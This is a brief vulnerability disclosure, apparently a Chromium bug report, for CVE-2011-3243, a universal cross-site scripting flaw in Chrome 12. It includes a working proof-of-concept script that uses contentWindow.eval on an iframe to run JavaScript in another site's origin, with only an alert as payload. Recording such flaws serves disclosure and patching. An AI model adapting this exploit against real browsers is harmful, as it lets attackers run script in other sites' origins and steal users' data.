CVE-2011-3243

Universal XSS using contentWindow.eval

May 24 2011

VULNERABILITY DETAILS

PoC:

<script>
  i = document.body.appendChild(document.createElement("iframe"));
  f = i.contentWindow.eval('(function(){location="javascript:alert(location)"})');
  i.src = "http://google.com";
  i.onload = f;
</script>

From comment #30 in bug 83096: access to this bug is restricted it becomes a different-origin window after eval() is called. eval() is used to construct a function with the context of that window.

VERSION

Chrome: Version 12

Link: https://bugs.chromium.org/p/chromium/issues/detail?id=83743